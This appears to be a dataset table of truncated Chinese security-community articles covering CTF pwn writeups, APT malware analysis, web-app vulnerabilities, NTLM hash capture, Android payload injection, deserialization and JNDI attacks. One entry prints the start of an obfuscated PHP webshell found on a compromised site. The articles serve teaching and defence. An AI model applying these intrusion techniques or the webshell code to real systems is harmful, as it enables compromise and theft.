text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# 2019 BsidesSF straw-clucher PWN
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
前端时间有机会做了这个比赛的题目,当时一直在看WaterDragon这道题目,比赛结束了也没有做出来。straw-clucher和WaterDragon这两道题目相对于一般的pwn题目而言代码量较大一些,之前也很少接触这种代码量比较大的题目,通常pwn题目考察的大多数是漏洞的利用,但这道题目考察的侧重于源代码的审计(当然也有例外,比如WaterDragon,找不到洞,大佬的wp我也找不到),所以记录一下这类题目。
这道题目的代码大多数是字符的比较,第一眼看上去可能有点发蒙,但是仔细... | 社区文章 |
## 前言
正值周末,有幸ak了这个比赛的web,正好去年也打过一次,附上去年的题解
http://skysec.top/2017/11/05/%E4%B8%8A%E6%B5%B7%E7%BA%BF%E4%B8%8A%E8%B5%9Bweb%E9%A2%98%E8%A7%A3/
这次有幸所有题目都拿了前3血~以下是这次的记录
## web1
拿到题目
http://745fca0a178a41589917dd014537bd862c411015831d4eeb.game.ichunqiu.com/
提示我们访问robots.txt
what are you doing?<br /> <!-- you nee... | 社区文章 |
# KimSuky样本分析思路分享
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 概述
KimSuky是总部位于朝鲜的APT组织,根据卡巴的情报来看,至少2013年就开始活跃至今。该组织专注于针对韩国智囊团以及朝鲜核相关的目标。KimSuky有不少别名,包括Velvet
Chollima, Black Banshee, Thallium, Operation Stolen
Pencil等。[malpedia](https://malpedia.caad.fkie.fraunhofer.de/actor/kimsuky)上有关于KimSuky的详细介绍。
关于KimSuky,笔者之前写过... | 社区文章 |
## 0x01 前言
通达OA(Office
Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。
## 0x02 目录及版本
### 目录结构
目录名称 | 用途
---|---
attach | OA附件文件存放目录
bin | Apache、PHP、Zend等主程序及配置文件,服务配置程序等
data5 | MySQL数据库文件目录
logs | Apache等日志文件目录
MyAdmin | 通达OA的MySQL管理工具
mysql5 | MySQL主程序文件
nginx | Nginx Web应用服务 ... | 社区文章 |
# FOFA网络空间资产搜索引擎使用指南
|
##### 译文声明
本文是翻译文章,文章来源:安全客
译文仅供参考,具体内容表达以及含义原文为准。
****
**一、导语**
* * *
随着网络安全的普及,黑客的攻击手段也日新月异,越来越多的企业对网络安全产品与服务的需求有了新的变化。那么,在险象丛生的互联网世界之中企业如何能够更加有效的保护自己的网络空间资产呢?FOFA给出了相应的解决方案。与传统扫描相比,企业更需要一款能够根据特征、检索条件迅速进行全网资产匹配的搜索引擎。“佛法无边”通常比喻神通广大,无所不能,企业用户终于可以安心的“抱佛脚”了,FOFA可以迅速进行网站资产匹配,加快后续工作进程,如漏洞影响范围分析,应用分布统... | 社区文章 |
**作者:国家互联网应急中心CNCERT
公众号:<https://mp.weixin.qq.com/s/-p7Uf9vdoJPTgKVAEPpbYA>**
当前,网络安全威胁日益突出,网络安全风险不断向政治、经济、文化、社会、生态、国防等领域传导渗透,各国加强网络安全监管,持续出台网络安全政策法规。2018年,在中央网络安全和信息化委员会(原“中央网络安全和信息化领导小组”)的统一领导下,我国进一步加强网络安全和信息化管理工作,各行业主管部门协同推进网络安全治理。国家互联网应急中心(以下简称“CNCERT”)持续加强我国互联网网络安全监测,开展我国互联网宏观网络安全态势评估,网络安全事件监测、协调处置和预警通报工作,取得了显著... | 社区文章 |
## JDWP
JDWP 是 Java Debug Wire Protocol 的缩写,在JPDA(Java Platform Debugger
Architecture)中,它定义了调试器(debugger)和被调试的 Java 虚拟机(target vm)之间的通信协议。
与PHP的 `Xdebug` 类似,当其调试端口直接开放在公网上时,很容易被攻击者攻击并且获取系统权限。
#### Useful link:
JDWP:<https://docs.oracle.com/en/java/javase/11/docs/specs/jdwp/jdwp-protocol.html>
JDPA:<https://docs.oracl... | 社区文章 |
**作者:lucifaer
作者博客:<https://www.lucifaer.com/>**
RF-14310,另一个RichFaces的漏洞,利用面要比CVE-14667广。
### 0x00 漏洞概述
> JBoss RichFaces 3.1.0 through 3.3.4 allows unauthenticated remote attackers
> to inject expression language (EL) expressions and execute arbitrary Java
> code via a /DATA/ substring in a path with an
> org.richf... | 社区文章 |
拿到手域名一个 cc.test.com 打开后直接就是一个登陆框
随手输入admin准备打密码,提示管理员不存在
说明此处可以爆破用户名,使用字典爆破得到三个用户名
test
wangw
wangy
登陆抓包密码被md5加密了
使用多账号爆破小字典爆破三个账号的密码,没有爆出来
使用常用弱口令top5000爆破依然爆破不出来
根据厂商域名生成字典(以test代替)
爆破三个用户依然爆破不成功,于是回到用户名爆破,可以注意到
wangw
wangy
这两个用户名为姓的全拼加名的简拼,于是在字典库里找了一下这种规则的用户名字典,只找到一个中国姓名top500姓全拼加简拼没啥用(应该我之前爆破的... | 社区文章 |
# 前言
在内网渗透的过程中,最重要的就是信息搜集,但是在极端情况下我们找不到能够横或者跨域的机器,那么这时候我们就可以尝试做一个水坑,来尝试获取hash。当然这只是理想情况,在愈发强调对抗的当下,利用水坑钓鱼也变得不是那么简单。
# 本地认证
既然是获取hash就需要一些基础知识,这里首先说以下本地认证。在Windows中,密码Hash称之为NTLM
Hash,这个NTLM是一种网络认证协议,与NTLM Hash的关系就是:NTLM网络认证协议是以NTLM
Hash作为根本凭证进行认证的协议。在本地认证的过程中,其实就是将用户输入的密码转换为NTLM Hash与SAM中的NTLM Hash进行比较
假设我的密码是admin,那么操... | 社区文章 |
# 故事分享:我与ISIS的恩怨情仇
|
##### 译文声明
本文是翻译文章,文章原作者 ibrascript,文章来源:ibrascript.com
原文地址:<https://www.ibrascript.com/my-affair-with-isis-death-threats-de-anonymization-and-phishing-links/>
译文仅供参考,具体内容表达以及含义原文为准。
## 写在前面的话
很多人都想成为有影响力的人,但他们却没有意识到影响力越大,责任也就越大!
如果你在上网的过程中没有安全意识的话,那么社交媒体对你来说可能会是一个非常危险的东西。这里我并不是要讨论社交媒体对人们精神层面的影响,你... | 社区文章 |
# 如何在受限环境中利用Firefox执行系统命令
原文:<https://www.contextis.com/en/blog/escaping-from-mozilla-firefox-in-restricted-environments>
## 0x00 概述
在受限软件环境中,用户应该只能执行有限的几种任务,此时系统通常会使用Kiosk应用程序来减少用户与系统交互的机会。在许多环境中,系统会根据用户实际需要,只将少数几种预置的应用程序提供给用户,如Web浏览器或POS软件等。
对于此类受限环境,攻击者通常会尝试寻找方法绕过已发布应用程序,以便在底层操作系统上执行命令。攻击者的最终目标通常是在系统上建立立足点,并可能危及与其相连... | 社区文章 |
# 深入分析微软新引入的内核虚拟地址影子(KVAS)特性
|
##### 译文声明
本文是翻译文章,文章原作者 Minh Tran ,文章来源:blog.fortinet.com
原文地址:<https://blog.fortinet.com/2018/01/25/a-deep-dive-analysis-of-microsoft-s-kernel-virtual-address-shadow-feature>
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
目前,针对Meltdown和Spectre,各方仍然在努力修复这两个漏洞,包括苹果、甲骨文和微软在内的大型厂商,已经陆续发布了补丁。英特尔发布的补丁存在一些潜在的问题... | 社区文章 |
# 【技术分享】如何手动将Metasploit的Payloads注入到Android应用中
|
##### 译文声明
本文是翻译文章,文章来源:pentestlab.blog
原文地址:[https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually/](https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually/)
译文仅供参考,具体内容表达以及含义原文为... | 社区文章 |
# 【技术分享】看我如何利用他人的账号来发推文
|
##### 译文声明
本文是翻译文章,文章来源:kedrisec.com
原文地址:<http://kedrisec.com/twitter-publish-by-any-user/>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
翻译:[WisFree](http://bobao.360.cn/member/contribute?uid=2606963099)
预估稿费:160RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**写在前面的话**
近期,我在对社交网络Twitter进行漏洞挖掘(遵循Twitter的漏... | 社区文章 |
# 摘要
[pwntools](https://github.com/Gallopsled/pwntools
"pwntools")是一个CTF框架和漏洞利用开发库,用Python开发,旨在让使用者简单快速的编写exploit。
# 安装
安装pwntools步骤:
#更新包
sudo apt-get update
#安装必要的组件
sudo apt-get install -y python2.7 python -pip python-dev git libssl-dev libffi-dev build-essential
#升级Python的包管理器
pip install --... | 社区文章 |
# Windows DNS Server 漏洞研究之补丁分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
2021 年 3 月,微软于补丁日发布了关于 Windows DNS Server 的五个远程代码执行漏洞和两个拒绝服务漏洞,漏洞编号如下:
**RCE漏洞**
CVE-2021-26877,CVE-2021-26897(Exploitation More Likely)
CVE-2021-26893,CVE-2021-26894,CVE-2021-26895(Exploitation Less Likely)
**DoS漏洞**
CVE-2021-26896,CVE-2021... | 社区文章 |
`本文为2018年十大网络黑客技术题名文章,欢迎读者来读`
我们不知道VPN的扩展功能是何时流行起来的,但VPN扩展实际上应该被称为代理扩展。其底层不只是VPN还包括代理服务,但VPN生产商却声称其具有很强的安全性与私密性。
经过几次VPN扩展的测试和研究工作,我得出结论,几乎所有的VPN扩展都容易受到IP泄漏和DNS泄漏的影响。
具有讽刺意味的是,尽管大多数漏洞的原因都出自于扩展的错误配置,但浏览器也需要对此负责,因为代理的配置重存在很多陷阱和误导性文档。
### PAC脚本
Chrome和Firefox都提供了用于注册PAC(代理自动配置)脚本的扩展的API。
它是一个`JavaScript`文件,它公开了一个函数`FindPr... | 社区文章 |
# 【技术分享】Dridex和Locky重现江湖,通过PDF附件传播恶意代码
|
##### 译文声明
本文是翻译文章,文章来源:fireeye.com
原文地址:<https://www.fireeye.com/blog/threat-research/2017/05/dridex_and_lockyret.html>
译文仅供参考,具体内容表达以及含义原文为准。
****
****
翻译:[ **童话**](http://bobao.360.cn/member/contribute?uid=2782911444)
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**传送门**
[**Drid... | 社区文章 |
# 深入理解win32(十一)
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
在上一节里面我们实现了进程的遍历以及初步了解了线程,在这一节里面我们继续来对线程控制来进行探究。
## 线程控制
我们首先来看两个api
**SuspendThread**
用来挂起线程,如果函数成功, 传回线程目前的挂起次数。如果失败, 则传回0xFFFFFFFF
case IDC_BUTTON2:
{
::SuspendThread(hThread); ... | 社区文章 |
# CVE-2020-17087在野0day分析
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 前言
2020年10月30日,谷歌P0团队[批露](https://bugs.chromium.org/p/project-zero/issues/detail?id=2104)了微软尚未修复的内核在野0day,[CVE-2020-17087,](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17087)
谷歌称目前已发现在野利用,目前微软尚未发布针对此漏洞的补丁程序,预计本周二(11/10)补丁日进行修复。
目前此漏洞POC... | 社区文章 |
# 【木马分析】TrickBot – 银行木马Dyreza的继承者
|
##### 译文声明
本文是翻译文章,文章来源:blog.malwarebytes.com
原文地址:<https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/>
译文仅供参考,具体内容表达以及含义原文为准。
****
**翻译:**[ **myswsun**
****](http://bobao.360.cn/member/contribute?uid=2775084127)
**预估稿费:200RMB(不服你也来投稿啊!)**
******投稿方式:发... | 社区文章 |
# python pickle 反序列化总结
### pickle 基础
pickle 是一种栈语言,有不同的编写方式,基于一个轻量的 PVM(Pickle Virtual Machine)。
> * 指令处理器
>
> 从流中读取 opcode 和参数,并对其进行解释处理。重复这个动作,直到遇到 . 这个结束符后停止。最终留在栈顶的值将被作为反序列化对象返回。
>
> * stack
>
> 由 Python 的 list 实现,被用来临时存储数据、参数以及对象。
>
> * memo
>
> 由 Python 的 dict 实现,为 PVM 的整个生命周期提供存储。
>
>
**类似于我们在 PHP 中的 seria... | 社区文章 |
### 偷窥扩展程序中未被污染的安全反模式
#### 内容脚本不服从任何限制或CSP策略
谈及到后台页面的内容安全策略(CSP)要求时,人们也许会认为跨站点脚本(XSS)在Chrome扩展程序中已经不存在了。但事实并非如此,它只是被附加到了扩展程序的内容脚本端。内容脚本不必遵守扩展声明的CSP,它们也不必遵守它们正在执行的网页的CSP(除非他们将`<script>`注入到网页的DOM中)。因此,如果<https://example.com>
具有以下CSP:
script-src 'self'; object-src 'self'
这与在内容脚本上下文中执行的JavaScript完全无关。例如,尽管它被自己的源网页禁止,它也... | 社区文章 |
本文主要简述当Windows系统中存在恶意可执行程序时,如何发现恶意程序的执行痕迹(文件路径、时间等),以及相关的辅助分析工具。
从注册表、文件、日志三个方面介绍,以及简单介绍下Win10中的几个特有功能。
### 一、注册表
#### 1)ShimCache
ShimCache 又称为AppCompatCache,从 Windows
XP开始存在,用来识别应用程序兼容性问题。跟踪文件路径,大小和上次修改时间(LastModifiedTime)和上次更新时间(LastUpdateTime)。
其中在Windows7/8/10系统中最多包含1024条记录,Windows7/8/10系统中不存在“上次更新时间”。
注册表中位... | 社区文章 |
[TOC]
# 预知识
## Apk应用启动过程
1.(Launcher应用程序中执行)点击图标,Launcher应用程序通知ActivityManagerService开启activity
2.(ActivityManagerService组件中执行)ActivityManagerService通过IBinder向Launcher组件发送SCHEDULE_PAUSE_ACTIVITY_TRANSACTION
3.(Launcher应用程序中执行)Launcher的ActivityThread来处理发送来的消息,暂停Launcher组件,接着发送ACTIVITY_PAUSED_TRANSACTION消息给ActivityManage... | 社区文章 |
**作者:深信服千里目安全实验室**
**相关阅读:
1、[【Rootkit 系列研究】序章:悬顶的达摩克利斯之剑](https://paper.seebug.org/1867/ "【Rootkit
系列研究】序章:悬顶的达摩克利斯之剑")
2、[【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁](https://paper.seebug.org/1868/
"【Rootkit 系列研究】Windows平台的高隐匿、高持久化威胁")
3、[【Rootkit 系列研究】Linux平台的高隐匿、高持久化威胁](https://paper.seebug.org/1870/
"【Rootkit系列研究】L... | 社区文章 |
**Author: dawu@Knownsec 404 Team**
**Date: August 16, 2018**
**Chinese Version:<https://paper.seebug.org/668/>**
### 0x00 Why Xdebug Caught My Attention
I met a large array `$form` when I was debugging Drupal remote code execution
vulnerability (CVE-2018-7600 & CVE-2018-7602) with PhpStorm.
As a security researcher... | 社区文章 |
# 美国中央情报局(CIA)“蜂巢”恶意代码攻击控制武器平台分析报告
##### 译文声明
本文是翻译文章,文章原作者 信息安全摘要,文章来源:信息安全摘要
原文地址:<https://www.cverc.org.cn/head/zhaiyao/news20220419-hive.htm>
译文仅供参考,具体内容表达以及含义原文为准。
近日,国家计算机病毒应急处理中心对“蜂巢”(Hive)恶意代码攻击控制武器平台(以下简称“蜂巢平台”)进行了分析,蜂巢平台由美国中央情报局(CIA)数字创新中心(DDI)下属的信息作战中心工程开发组(EDG,以下简称“美中情局工程开发组”)和美国著名军工企业诺斯罗普·格鲁曼(NOC)旗下XETRON公... | 社区文章 |
# AdminSDHolder
本次安全科普为大家介绍AD域中的AdminSDHolder,与AdminSDHolder相关的特性频繁被攻击者利用来进行留后门等操作,在检查AD域安全时AdminSDHolder相关属性也是排查的重点。
## 0x00 域内受保护的用户和组
在Active Directory中,一些高权限的用户和组被视为受保护的对象
通常对于受保护的用户和组,权限的设置和修改是由一个自动过程来完成的,这样才能保证在对象移动到其他目录时,对象的权限也始终保持一致
不同系统版本的域控制器上受保护的用户和组也不同,具体可以参考微软文档:[APPENDIX-C--PROTECTED-ACCOUNTS-AND-GROUPS-I... | 社区文章 |
原文:<https://blog.rapid7.com/2019/01/03/santas-elfs-running-linux-executables-without-execve/>
这篇博客是年度的[12 Days of HaXmas](https://blog.rapid7.com/tag/haxmas/)系列博客中的第11篇。
Executable and Linkable Format ( ELF )
是许多类Unix操作系统(如Linux,大多数现代BSD和Solaris)的基础。ELF文件有许多技巧,比如我们在[our *nix Meterpreter
implementation](https://www.slid... | 社区文章 |
## 0x01 前言
`printf`是TokyoWesterns CTF
2019一道格式化漏洞利用题,有意思的是,题目给的二进制程序自己实现了一个`printf`函数。一般,在调用完main函数以后,程序call
`__libc_start_main`,继续调用`exit`退出。若能够覆盖`exit`中的函数指针,便可在程序退出的时候劫持程序控制流。
## 0x02 加载libc
题目给了3个文件,除了常规的libc还额外给了一个ld.so,ld.so用于装载libc。这里需要用到[patchelf](https://github.com/NixOS/patchelf)这个工具,执行以下命令,将libc和ld.so指向题目所给的... | 社区文章 |
# 1月13日安全热点–Intel的AMT安全问题/DNS篡改恶软OSX/MaMi
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 资讯类
2018年才过去两周,就迎来了macOS平台的DNS篡改恶意软件OSX/MaMi
<https://www.bleepingcomputer.com/news/apple/the-first-mac-malware-of-2018-is-a-dns-hijacker-called-mami/>
<https://www.tomsguide.com/us/mami-mac-malware,news-26451.html>
这个恶意软件的信息最早出现在mal... | 社区文章 |
# tl;dr
SQLite是世界上部署最多的软件之一。然而,从安全的角度来看,它只是通过WebSQL和浏览器开发的视角来进行安全检查。对于安全检查来说,这只是冰山一角。
在我们的长期研究中,我们尝试了在SQLite中利用内存损坏问题,而不依赖SQL语言以外的任何环境。使用我们创新的查询劫持和面向查询编程技术,我们证明了能够在SQLite引擎中利用内存损坏问题。我们将在几个实际场景中演示这些技术:pwning密码窃取者后端服务器,以及使用更高的权限实现IOS持久性。
我们希望发布我们的研究方法,能对其他安全从业人员有所启发,继续在无数可用的场景中审查SQLite。鉴于SQLite实际上是嵌入到每个主要的操作系统(桌面或移动)... | 社区文章 |
# JNDI基础
JNDI的有关类:
InitialContext类:
InitialContext()
构建一个初始上下文。
InitialContext(boolean lazy)
构造一个初始上下文,并选择不初始化它。
InitialContext(Hashtable<?,?> environment)
使用提供的环境构建初始上下文。
InitialContext initialContext = new InitialContext();
> 常用方法:
>
>
> bind(Name name, Object obj)
> ... | 社区文章 |
# 深入分析PE可执行文件是如何进行加壳和数据混淆的
##### 译文声明
本文是翻译文章,文章原作者 dtm,文章来源:0x00sec.org
原文地址:<https://0x00sec.org/t/packers-executable-compression-and-data-obfuscation/847>
译文仅供参考,具体内容表达以及含义原文为准。
>
> 在本文,我们将以一个可执行文件的压缩过程为例,详细讲解我在过去的两天之中时如何对它进行加壳的。就像是Crypters一样,我认为这一过程仿佛是地下社团开展的某种暗黑艺术。尽管目前,存在着很多可以公开的加壳器(Packer,例如UPX、Themida等),但我还没有看到... | 社区文章 |
# 【技术分享】针对跨浏览器的本地文件泄露漏洞的分析
|
##### 译文声明
本文是翻译文章,文章来源:安全客
原文地址:<http://leucosite.com/Chrome-Firefox-Edge-Local-File-Disclosure/>
译文仅供参考,具体内容表达以及含义原文为准。
****
翻译:[shan66](http://bobao.360.cn/member/contribute?uid=2522399780)
预估稿费:120RMB
投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿
**
**
**前言**
你知道吗?你可以轻松把普通的文件选择器变成文件夹选择器,为此,只需将属性... | 社区文章 |
原文来自安全客,作者:区块链威胁情报
原文链接:<https://www.anquanke.com/post/id/146702>
#### 安全事件
最近,智能合约漏洞很火。
让我们再来看一下4月22日BeautyChain(BEC)的智能合约中一个毁灭性的漏洞。
BeautyChain团队宣布,BEC代币在4月22日出现异常。攻击者通过智能合约漏洞成功转账了10^58 BEC到两个指定的地址。
具体交易详情<https://etherscan.io/tx/0xad89ff16fd1ebe3a0a7cf4ed282302c06626c1af33221ebe0d3a470aba4a660f>
攻击者到底是怎么攻击的?为什么能转账... | 社区文章 |
最近朋友站被频繁挂马、暂未找到寄生虫的寄生位置,貌似是着急处理把寄生虫清理了,没有备份,以前见过一次没有分析,也是各种绕,里面发现了一个一句话木马,真是奇葩、源代码如下:
<?php
function cve($str,$key)
{
$t="";
for($i=0; $i<strlen($str); $i=$i+2)
{
$k=(($i+2)/2)%strlen($key);
$p=substr($key, $k,1);
if(is_numeric(substr($str, $i,1)))
{
$... | 社区文章 |
# EOS新型攻击手法之 hard_fail 状态攻击
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
by yudan@慢雾安全团队
## 前言
昨日(2019 年 3 月 10 日)凌晨,EOS游戏 Vegas Town(合约帐号 eosvegasgame)遭受攻击,损失数千
EOS。慢雾安全团队及时捕获这笔攻击,并同步给相关的交易所及项目方。本次攻击手法之前没有相同的案例,但可以归为假充值类别中的一种。对此慢雾安全团队进行了深入的分析。
## 攻击回顾
根据慢雾安全团队的持续分析,本次的攻击帐号为 fortherest12,通过 eosq 查询该帐号,发现首页存在大量的错误执行交易:
查看其... | 社区文章 |
# 前言
本文主要分析了`Shadowsocks`的源码和密码学漏洞原理
## socks5
一种网络协议, 由于支持`tcp`和`udp`所以经常用于`客户端`和外`部网络服务器`之间的中间传输
### socks5协议分析
本地写了个转发,监听在`8081`端口
通过代理访问`pwnsky.com`的流量包如下
通过`psh`包的跟踪tcp流量获取到如下流量包
内容如下, 有缩进的为`服务端`返回的数据
00000000 05 02 00 01 ....
00000000 05 00 ... | 社区文章 |
# 【技术分享】滥用WebVTT和CORS
|
##### 译文声明
本文是翻译文章,文章来源:安全客
原文地址:<http://blog.k3170makan.com/2016/09/abusing-webvtt-and-cors-for-fun-and.html>
译文仅供参考,具体内容表达以及含义原文为准。
WebVTT是html5开发人员用来显示和提示文本字幕的视频格式。WebVTT的语法非常简单,这点深受浏览器喜爱,因为为了给用户提供最好的体验,浏览器总是希望将复杂的语法结构统一起来。但是,这可能会存在一些问题(下面会做具体分析),而这些问题有可能会被别人利用。本文主要介绍在一些攻击场景下利用WebVTT进行信息提取或实现... | 社区文章 |
### 影响范围
DedeCMS v5.8.1 beta 1
### 漏洞类型
SSTI RCE
### 利用条件
影响范围应用
### 漏洞概述
2021年9月30日,国外安全研究人员Steven
Seeley披露了最新的DedeCMS版本中存在的一处SQL注入漏洞以及一处SSTI导致的RCE漏洞,由于SQL注入漏洞利用条件极为苛刻,故这里只对该SSTI注入漏洞进行简要分析复现
### 漏洞复现
#### 环境搭建
这里使用phpstudy来搭建环境
网站前台:<http://192.168.59.1/index.php?upcache=1>
网站后台: <http://192.168.59.1/dede/login.ph... | 社区文章 |
原文:
<https://mannulinux.blogspot.com/2018/12/remotely-dump-active-directory-domain.html>
大家好,本文我想给大家分享一些关于“Windows活动目录(AD)”环境相关的内容。我会给大家演示如何只使用webshell来dump
Windows活动目录用户数据库。
在渗透测试期间,通常会有这样的情况,渗透测试员拿到了域管理员的用户凭证,并且获得了其中一台主机的webshell,而这台主机连接到了Windows活动目录林。渗透测试员尝试得到反向shell,但是因为某些原因一直拿不下(比如说有网络防火墙做了策略),但是渗透测试员的目的是dump
AD... | 社区文章 |
# 2017年度安全报告––应用漏洞
##### 译文声明
本文是翻译文章
原文地址:<https://cert.360.cn/static/files/2017%E5%B9%B4%E5%BA%A6%E5%AE%89%E5%85%A8%E6%8A%A5%E5%91%8A--%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E.pdf>
译文仅供参考,具体内容表达以及含义原文为准。
## 摘要
应用程序作为计算机服务的直接提供者,其存在是必不可缺的。除了传统的CS应用之外还出现了各种的web应用,相应的还有提供web服务的各类web容器。应用是广泛的存在于我们的日常生活中的,如若其中出现了安全问题,将可能直接影响业... | 社区文章 |
**作者:c0ny1**
**原文链接:<https://mp.weixin.qq.com/s/uWyHRexDZWQwp81lWjmqqw>**
## 0x01 前言
本文献给永远的`Avicii`,严格意义上我不算是一个`reaver`。但并不妨碍我深深的喜欢你的作品,它们陪伴着我度过了无数个编程的夜晚,十分感谢。今天不同人用不同的方式怀念你,我不会作曲,也不敢纹身。能给你分享的是我所热爱的事,在我看来这是最有质感的东西。R.I.P
## 0x02 背景
最近圈子里各位师傅都在分享shiro回显的方法,真是八仙过海过海各显神通。这里我也分享下自己针对回显的思考和解决方案。师傅们基本都是考虑中间件为Tomcat,框架为Shir... | 社区文章 |
作者: **[龚广_OldFresher](http://weibo.com/u/5274004507?is_hot=1)**
原文地址:[《蝴蝶效应与程序错误 ——
一个渣洞的利用》](http://weibo.com/ttarticle/p/show?id=2309404118504042313519)
这算是我写得最详细的一个 v8 漏洞利用了,其中将一个越界读漏洞转变为越界写的思路比较有意思。
#### 1\. 介绍
一只南美洲亚马孙河流域热带雨林中的蝴蝶,偶尔扇动几下翅膀,可能在美国德克萨斯引起一场龙卷风吗?这我不能确定,我能确定的是程序中的任意一个细微错误经过放大后都可能对程序产生灾难性的后果。在11月韩国首尔举行的
P... | 社区文章 |
# 前言
这里时Sulley使用手册的第二部分。
手册链接:<http://www.fuzzing.org/wp-content/SulleyManual.pdf>
# Sessions
一旦定义了许多request,就可以在session中将它们绑定在一起了。
Sulley相对于其他fuzz框架的主要优点之一是它能够在协议中“深入”fuzz,这是通过将request链接在一个graph(图)中实现的。在下面的示例中,request序列被绑定在一起,并且利用session和请求类扩展的PGRAPH库,以UDRAW格式呈现图形:
from sulley import *
s_initialize("helo")... | 社区文章 |
# 【权威报告】高级威胁报告:Grand Mars行动—对抗Carbanak网络攻击
|
##### 译文声明
本文是翻译文章,文章来源:2.trustwave.com
原文地址:<https://www2.trustwave.com/Operation-Grand-Mars.html>
译文仅供参考,具体内容表达以及含义原文为准。
****
**翻译:**[ **pwn_361**
****](http://bobao.360.cn/member/contribute?uid=2798962642)
**预估稿费:300RMB**
**投稿方式:
发送邮件至[linwei#360.cn](mailto:linwei@360.cn)... | 社区文章 |
# PancakeBunny攻击事件复盘分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 事件背景
PancakeBunny致力于通过为用户提供一种简便的方法,通过Binance Smart Chain自动组合其收益,来支持底层的DeFi生态系统。
零时科技区块链安全情报平台监控到消息,北京时间2021年5月20日,PancakeBunny官方发推文称PancakeBunny遭到闪电贷攻击,导致Bunny价格暴跌,零时科技安全团队及时对该安全事件进行复盘分析。
## 事件分析
**攻击信息**
通过零时科技安全团队初步追踪分析,此次攻击信息如下:
攻击者钱包地址:
<https://bs... | 社区文章 |
**作者:启明星辰ADLab
公众号:<https://mp.weixin.qq.com/s/MgttHkorVd5UrW1Cnlc5Xw>**
## 一、漏洞背景
2020年2月,Android安全公告中披露并修复了一个严重漏洞,漏洞编号为CVE-2020-0022,又称BlueFrag,可影响Android蓝牙子系统。该漏洞是一个远程代码执行漏洞,出现在Bluedroid蓝牙协议栈的HCI层,当无线模块处于活动状态时,攻击者可以利用蓝牙守护程序提升权限进而在设备上执行代码。该漏洞影响Android
Oreo(8.0和8.1)、Pie(9),但无法在Android 10上进行利用,仅能触发DoS攻击。
## 二、协议简介
##... | 社区文章 |
**译者:知道创宇404实验室翻译组
原文链接:<https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight>**
### 主要发现
* Proofpoint研究人员多年来一直在追踪一个针对航空、航天、交通、制造业和国防工业的持续网络犯罪者。
* 黑客者一贯使用远程访问木马(rat) ,可用于远程控制受到感染的机器。
* 黑客关注了与航空、交通和旅行相关的类型。自2017年以来,这个威胁行为者一直攻击类似的产业和目标。
### 概览
Ta2541是一个常年活跃的网络犯罪分子,它分发各种远程访问木马(rat) ,目标是航空、航天、运... | 社区文章 |
来源: **[盘古实验室](http://blog.pangu.io/mach-portal-details/)**
作者: **[windknown@PanguTeam](http://blog.pangu.io/author/windknown/)**
前不久GP0的研究员Ian Beer公布了针对iOS
10.1.1的[漏洞细节及利用代码](https://bugs.chromium.org/p/project-zero/issues/detail?id=965#c2),通过结合三个漏洞获取设备的root
shell。之后意大利研究员[@qwertyoruiopz](https://twitter.com/qwertyorui... | 社区文章 |
# 【技术分享】Use MSBuild To Do More(渗透中MSBuild的应用技巧)
|
##### 译文声明
本文是翻译文章,文章来源:安全客-三好学生
译文仅供参考,具体内容表达以及含义原文为准。
****
**作者:三好学生**
**稿费:500RMB(不服你也来投稿啊!)**
**投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿**
****
**0x00 前言**
最近Casey Smith@subTee更新了一系列关于”MSBuild”的研究进展,对我有很大启发。
本文将基于他公开的POC,并结合我的研究心得,介绍以下MSBuild的应用技巧:
Execute PowerShell Comm... | 社区文章 |
活动结束,2017-9-20
* * *
活动奖励:通用奖励奖金1.1-1.5倍
活动时间:20170824——201709中旬
<table> dedecms(V5.7SP2正式版) SQL注入 命令执行 文件包含 文件上传getshell wordpress 4.8.x SQL注入
命令执行 文件包含 文件上传getshell 微擎 1.0 SQL注入 命令执行 文件包含 文件上传getshell DiscuzX x3.4,x3.3
SQL注入 命令执行 文件包含 文件上传getshell phpcmsv9 SQL注入 命令执行 文件包含 文件上传getshell ecshop 3.6
SQL注入 命令执行 文件包含 文件上传g... | 社区文章 |
# Lua程序逆向之为Luac编写IDA Pro文件加载器
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
距离上一次讲Lua程序逆向已经有一段时间了,这一次我们书接上回,继续开启Lua程序逆向系列之旅。
在软件逆向工程实践中,为第三方文件编写文件格式分析器与指令反汇编器是一种常见的场景。这一篇的主要目的是,讲解如何为IDA
Pro编写Luac的文件加载器,一方面强化对二进制文件格式的理解;另一方面,通过对IDA Pro进行扩展的插件式开发,更深入的领会IDA
Pro的设计思想,以及掌握更多的高级使用方法。
IDA
Pro提供了抽象的文件加载器与处理器模块概念。文件加载器与程序运行时的动态加载概... | 社区文章 |
**作者:Longofo@知道创宇404实验室**
**时间:2020年2月20日**
**英文版本:<https://paper.seebug.org/1137/>**
前不久有一个关于Apache Dubbo
